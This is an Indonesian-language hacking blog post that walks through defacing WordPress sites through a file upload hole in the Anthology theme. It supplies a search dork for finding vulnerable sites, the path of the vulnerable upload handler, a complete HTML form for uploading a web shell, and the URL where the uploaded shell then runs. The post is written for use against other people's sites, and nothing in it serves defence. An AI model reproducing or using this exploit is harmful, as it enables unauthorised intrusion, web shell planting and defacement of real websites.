Kamis, 10 Maret 2016

Deface dengan WordPress Anthology Themes Remote File Upload Vulnerability

Hallo fans .-. Nuenomaru disini.
Di postingan kali ini Nue akan Share Tutorial Exploit WordPress Anthology Themes Remote File Upload Vulnerability *ini exploit lama sih akwwkakwa.
iseng2 aja share, kali aja masih crotz wkwkw.
yupz ini adalah salah satu Bug/Celah yang ada pada theme CMS WordPress.



Lanjotz tutorial omz.
Dork: 
inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).


1. Dorking dengan menggunakan SearchEngine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: target.co.li/wp-content/themes/Anthology/functions/upload-handler.php

3. Vulnerability ~ Muncul tulisan error atau Blank *kira2 sih gitu akkwakw *maap kalo salah <(")



vuln boss

Copy Script CSRF Upload nya:

<form enctype="multipart/form-data" 
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />
</form>

*save dgn ekstensi .html & ubah target.co.li jadi target yang mau lo tusbol


jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.


Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3


sukses gengs :v

waktunya kita buka shell/file kita, gimana caranya o.O ?

Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php

Done x_O ,, faktor muka lah :)

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih


Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
soalnya bsk masih ada Ujian Sekolah awkakwwa.
Bye..


Kunjungin juga thread saya gengs: Forum BackBox Indonesia



source and thanks to: web archive 1337days







./Nuenomaru




Topi kebelakang, Mata ku jauh Menatap KeDepan ;)

















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

0 komentar:

Posting Komentar

 

ande ande lumoet Template by Ipietoon Cute Blog Design